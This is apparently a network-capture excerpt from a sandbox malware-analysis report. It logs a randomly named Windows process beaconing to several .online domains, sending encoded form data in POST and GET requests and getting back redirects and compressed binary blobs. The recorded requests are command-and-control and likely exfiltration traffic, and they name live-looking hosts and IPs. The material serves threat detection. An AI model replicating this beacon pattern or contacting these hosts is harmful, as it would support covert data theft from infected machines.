                                                                        date: Fri, 13 Dec 2024 12:09:23 GMT
                                                                        server: LiteSpeed
                                                                        cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                        location: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 50031 | 144.76.190.39 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 13:09:24.934504986 CET | 808 | OUT | POST /r67x/ HTTP/1.1
                                                                        Host: www.basicreviews.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.basicreviews.online
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 223
                                                                        Referer: http://www.basicreviews.online/r67x/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Ascii: 9B_ppt=4EttVWIf0lcP7SmncSC7QYxui1dp4D0E0jw3q6vquvZYPZVokHi5j8W2KeaKw7c8Ds8QN2hZS6+HuFkNZTDdMkSgkl0gWGHs30mlASoTm0VJU8S0jX8vIuOlsTJsDaOANFCmU3jdzpJIhl2seeDCLsUe/Q3XtQnxHoFTyRg6As/zQw2M6NUcpIaI72XUdm45FUyHwKICQQJwd7aMPFv8CNM=
Dec 13, 2024 13:09:26.190865040 CET | 1045 | IN | HTTP/1.1 302 Found
                                                                        Connection: close
                                                                        content-type: text/html
                                                                        content-length: 771
                                                                        date: Fri, 13 Dec 2024 12:09:25 GMT
                                                                        server: LiteSpeed
                                                                        cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                        location: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 50032 | 144.76.190.39 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 13:09:27.605433941 CET | 10890 | OUT | POST /r67x/ HTTP/1.1
                                                                        Host: www.basicreviews.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.basicreviews.online
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 10303
                                                                        Referer: http://www.basicreviews.online/r67x/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
Data Ascii: 9B_ppt= [TRUNCATED]
Dec 13, 2024 13:09:27.841203928 CET | 1236 | OUT | Data Ascii: enYTiy3qu5ohXeWH4D5Vq+qYnbYO2RF+8Ndcr5dzLIlaJRkVLp/L1RN4EOn1U8wUlLDtQD0kE3C4fnMUgFgfqpAcLdXpJjLrpqh8NL6pFhfibJqlCrPGG5miPx3EQcv/9h1aRYxyH3SEEDVr84KDfmpQ3E0tx6gSNpn6FoumNzPzWcEdK+2j9PAkH5ZHyBbFiCagmwdv3ZYwpEg5AQoo2y7wJCPl4GVSgaLCXTOJt+fVuXC8RVF


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 50033 | 144.76.190.39 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 13:09:30.255120993 CET | 518 | OUT | GET /r67x/?9B_ppt=1GFNWjEU8kwZ/mmLeya/cJNKrhAK4goi9jYztsjxkrAaNpZX0l6jkYi+VfuO97QxGNgBCFFWLt6B6VM0bCruEmjStFMTCnvezkXJEF9Ro0QfaPDcmWgUP4M=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1
                                                                        Host: www.basicreviews.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
Dec 13, 2024 13:09:31.568196058 CET | 1193 | IN | HTTP/1.1 302 Found
                                                                        Connection: close
                                                                        content-type: text/html
                                                                        content-length: 771
                                                                        date: Fri, 13 Dec 2024 12:09:31 GMT
                                                                        server: LiteSpeed
                                                                        cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                        location: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi?9B_ppt=1GFNWjEU8kwZ/mmLeya/cJNKrhAK4goi9jYztsjxkrAaNpZX0l6jkYi+VfuO97QxGNgBCFFWLt6B6VM0bCruEmjStFMTCnvezkXJEF9Ro0QfaPDcmWgUP4M=&Sbv8I=RfPDYvIHtJXp8
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                        31         | 192.168.2.4 | 50034       | 198.251.84.200 | 80               | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Timestamp                           | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:09:45.668402910 CET | 785               | OUT       | POST /3qlo/ HTTP/1.1
                                                                        Host: www.stationseek.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.stationseek.online
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 203
                                                                        Referer: http://www.stationseek.online/3qlo/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Ascii: 9B_ppt=e1edwNahiRaXckmlg/fKWz+eSxDO4t4vxRLQVRYWIlBl4m47Qlrsyka2tslssjEubrFpzzY4lPpswNFtK8oUe7xisssT1fbwSoU4ONz+3prr84Hb/v8Whl5Ah3ejimoIovPzY56hBCM8Fk9SKEFdSDpLcuj6qyYH8vkRwGZ6W7V+NET3yROzMWr+PxbOpsafFg==
                                                                        Dec 13, 2024 13:09:46.998615026 CET | 908 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Connection: close
                                                                        content-type: text/html
                                                                        content-length: 707
                                                                        date: Fri, 13 Dec 2024 12:09:46 GMT
                                                                        server: LiteSpeed
                                                                        location: http://www.stationseek.online/3qlo
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                        32         | 192.168.2.4 | 50035       | 198.251.84.200 | 80               | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Timestamp                           | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:09:48.322998047 CET | 805               | OUT       | POST /3qlo/ HTTP/1.1
                                                                        Host: www.stationseek.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.stationseek.online
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 223
                                                                        Referer: http://www.stationseek.online/3qlo/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Ascii: 9B_ppt=e1edwNahiRaXdF2llYzKCj+dWBDOud4rxRHQVT1JJXVl4D87BQHsxka2mMlpiDE1brJLzy04lLBswPNtKsUVcrxggMsrxfbwSoU4OMXY3pjr8I3b+LoV/15DpXej0WoMovPBY4mYBBk8FgtSK3dCYDpJYujk6nBM2aFHxAJ4bJtdFietjgvkeWPNS2S6kvnWekKWtTeqRQZGUGpDfKufGRA=
                                                                        Dec 13, 2024 13:09:49.661906004 CET | 908 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Connection: close
                                                                        content-type: text/html
                                                                        content-length: 707
                                                                        date: Fri, 13 Dec 2024 12:09:49 GMT
                                                                        server: LiteSpeed
                                                                        location: http://www.stationseek.online/3qlo
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                        33         | 192.168.2.4 | 50036       | 198.251.84.200 | 80               | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Timestamp                           | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:09:50.983047009 CET | 10887             | OUT       | POST /3qlo/ HTTP/1.1
                                                                        Host: www.stationseek.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.stationseek.online
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 10303
                                                                        Referer: http://www.stationseek.online/3qlo/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Ascii: 9B_ppt= [TRUNCATED]
                                                                        Dec 13, 2024 13:09:52.307467937 CET | 908 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Connection: close
                                                                        content-type: text/html
                                                                        content-length: 707
                                                                        date: Fri, 13 Dec 2024 12:09:52 GMT
                                                                        server: LiteSpeed
                                                                        location: http://www.stationseek.online/3qlo
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                        34         | 192.168.2.4 | 50037       | 198.251.84.200 | 80               | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Timestamp                           | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:09:53.647983074 CET | 517               | OUT       | GET /3qlo/?9B_ppt=T329z6mTpDO/RjmIsaX6GxS+fVaV1tgKwTndei0jE2s03jQmQlLR7HOZ8ZNHnRQMcrtNhio3hbZStuVrccVySYYypr0GxKLOZ6Y8dZz+3cHpxqLj7fYKvSQ=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1
                                                                        Host: www.stationseek.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Dec 13, 2024 13:09:54.980513096 CET | 1056 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Connection: close
                                                                        content-type: text/html
                                                                        content-length: 707
                                                                        date: Fri, 13 Dec 2024 12:09:54 GMT
                                                                        server: LiteSpeed
                                                                        location: http://www.stationseek.online/3qlo?9B_ppt=T329z6mTpDO/RjmIsaX6GxS+fVaV1tgKwTndei0jE2s03jQmQlLR7HOZ8ZNHnRQMcrtNhio3hbZStuVrccVySYYypr0GxKLOZ6Y8dZz+3cHpxqLj7fYKvSQ=&Sbv8I=RfPDYvIHtJXp8
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                        35         | 192.168.2.4 | 50038       | 217.160.0.60   | 80               | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Timestamp                           | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:10:00.847841978 CET | 776               | OUT       | POST /tycs/ HTTP/1.1
                                                                        Host: www.solarand.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.solarand.online
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 203
                                                                        Referer: http://www.solarand.online/tycs/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Ascii: 9B_ppt=EljWvU1xZkP2kMhyqJArnIIKe0IvELBgy6h/dBfI0hjROcg+O+TdE0kQlOfqqTZreUhuP0mx75yg/xqRnWX+NAj6zu7SpM2B+O7jU0R1/sthQqMmqGFbFI6/6E0+ZsgBIh7sjpP1Z6WIziSrT+XRo0woWaTbKSWxrL9qbVNfU9pvJT5VowYAsmapi1IyaF+Cew==
                                                                        Dec 13, 2024 13:10:02.206742048 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Date: Fri, 13 Dec 2024 12:10:01 GMT
                                                                        Server: Apache
                                                                        Content-Encoding: gzip
                                                                        Data Raw: [chunked, gzip-compressed binary body; hex and ASCII dumps omitted]
                                                                        Dec 13, 2024 13:10:02.206782103 CET | 899 | IN | Data Raw: [gzip-compressed binary continuation; hex and ASCII dumps omitted]


                                                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                        36         | 192.168.2.4 | 50039       | 217.160.0.60   | 80               | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Timestamp                           | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:10:03.508893967 CET | 796               | OUT       | POST /tycs/ HTTP/1.1
                                                                        Host: www.solarand.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.solarand.online
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 223
                                                                        Referer: http://www.solarand.online/tycs/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Ascii: 9B_ppt=EljWvU1xZkP2ltxyoqorw4ILQUIvKrBsy69/dAaX0zHRO5E+P6ndH0kQtufjnzZ0eU9cP1Kx752g/zyRnBLxMQj8+O7cns2B+O7jU0VT/vdhTb8m4zxYIo6+9E0+I8gFIh7ajsvLZ8SIzjirTKLQ/kwuY6SIDXrDq7s2bHNjeep8IV0P5B5X+m+a/yBGXGDLF0oXpeYqXOLcc9UmfYKpAxo=
                                                                        Dec 13, 2024 13:10:04.777515888 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Date: Fri, 13 Dec 2024 12:10:04 GMT
                                                                        Server: Apache
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                                        Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                                        Dec 13, 2024 13:10:04.777553082 CET | 899 | IN | Data Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                                        Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        37 | 192.168.2.4 | 50040 | 217.160.0.60 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:10:06.165910006 CET | 10878 | OUT | POST /tycs/ HTTP/1.1
                                                                        Host: www.solarand.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.solarand.online
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 10303
                                                                        Referer: http://www.solarand.online/tycs/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 45 6c 6a 57 76 55 31 78 5a 6b 50 32 6c 74 78 79 6f 71 6f 72 77 34 49 4c 51 55 49 76 4b 72 42 73 79 36 39 2f 64 41 61 58 30 7a 50 52 4f 76 59 2b 4f 62 6e 64 47 30 6b 51 6e 4f 66 75 6e 7a 59 75 65 55 31 59 50 31 32 68 37 37 2b 67 2b 51 36 52 77 6a 6a 78 43 51 6a 38 33 75 37 52 70 4d 32 55 2b 4f 72 6e 55 30 46 54 2f 76 64 68 54 5a 6b 6d 76 32 46 59 4f 6f 36 2f 36 45 30 36 5a 73 67 74 49 68 44 6b 6a 73 61 77 5a 4d 79 49 7a 44 79 72 41 76 58 51 67 55 77 57 62 36 54 50 44 58 76 59 71 36 41 36 62 47 70 4e 65 5a 5a 38 4b 68 74 58 6a 6a 68 63 73 55 57 72 71 79 64 45 50 33 57 53 4c 7a 38 57 6d 64 4d 64 4d 63 33 2b 51 64 70 57 48 71 2b 70 65 33 76 75 54 7a 35 31 43 79 78 72 69 67 46 4a 79 58 67 56 77 4a 68 39 49 4a 57 69 6f 70 67 51 51 55 35 37 4f 58 5a 6f 4e 38 44 46 66 4e 6b 44 62 66 64 6b 59 6f 52 43 30 76 6f 67 2f 2f 4c 36 31 6b 69 45 6f 2b 62 55 67 38 79 41 42 41 6c 30 54 49 34 55 49 70 64 68 55 43 6d 5a 47 77 57 47 52 69 45 77 46 4d 45 59 76 44 39 30 78 78 4c 44 67 6a 42 44 47 69 4a [TRUNCATED]
                                                                        Data Ascii: 9B_ppt=EljWvU1xZkP2ltxyoqorw4ILQUIvKrBsy69/dAaX0zPROvY+ObndG0kQnOfunzYueU1YP12h77+g+Q6RwjjxCQj83u7RpM2U+OrnU0FT/vdhTZkmv2FYOo6/6E06ZsgtIhDkjsawZMyIzDyrAvXQgUwWb6TPDXvYq6A6bGpNeZZ8KhtXjjhcsUWrqydEP3WSLz8WmdMdMc3+QdpWHq+pe3vuTz51CyxrigFJyXgVwJh9IJWiopgQQU57OXZoN8DFfNkDbfdkYoRC0vog//L61kiEo+bUg8yABAl0TI4UIpdhUCmZGwWGRiEwFMEYvD90xxLDgjBDGiJAYKpNTBKjfNl4sj6Xa+gb5PazirCW1k387ouakND45tzSLwGCBvZnvyW+MEtScahyh8IGSDr/hhENfj0dFofvCplM8231/FNfmxrR2AqkeDMH1ZsQYqvvMZtydyqfu9YLGn/+CAW5HieC12lWgTcDiKFBDqkBynTccWvPFslAlZpeDNwWR7qLkE49XdSgKUkHaklh0VhK9/nmCsN7TLXGxQCRG9C5s5dQeFBIkDOVlCRqu/maSPeHIb/eZcryM5MkFfDs3IFFA/ixcNwC4D8I1PHiJ/8erUcyNTGVd4ytgDVUsOLWQ8QcP7w46psHrNnhX2qR/gA+0WWkBUH3J+EPW8+HoNI/kdl8NqzX2xhtD0EF1USKmknZXIQTi+/7yQjxrOcBrgryaeF/X8wy2R3jSTmKsLrk6O9w22X0yNKsGeZ8QI0729IIqkEJpg9w/7atYxvdfOANys+W+1eqhc7OoVqgYjdhRaja8S2aBAp1TW0V7+4d4VS0RDGIKUSBlKwl4XqncuIR5EYsl+Qy4sbVEDu+zekKL7/7F7DVhv4YQZvFwfU0a8WfoYcNKw6WJ78jxa4G3/rxChQBwpgIl0YPve26ph+azlcbuTda9CUx2P2is85u812RgRmmuxyh/v7t+4iJP88//E3eOJKlYjI0nyyrQr91D2axL [TRUNCATED]
                                                                        Dec 13, 2024 13:10:07.610346079 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Date: Fri, 13 Dec 2024 12:10:07 GMT
                                                                        Server: Apache
                                                                        Content-Encoding: gzip
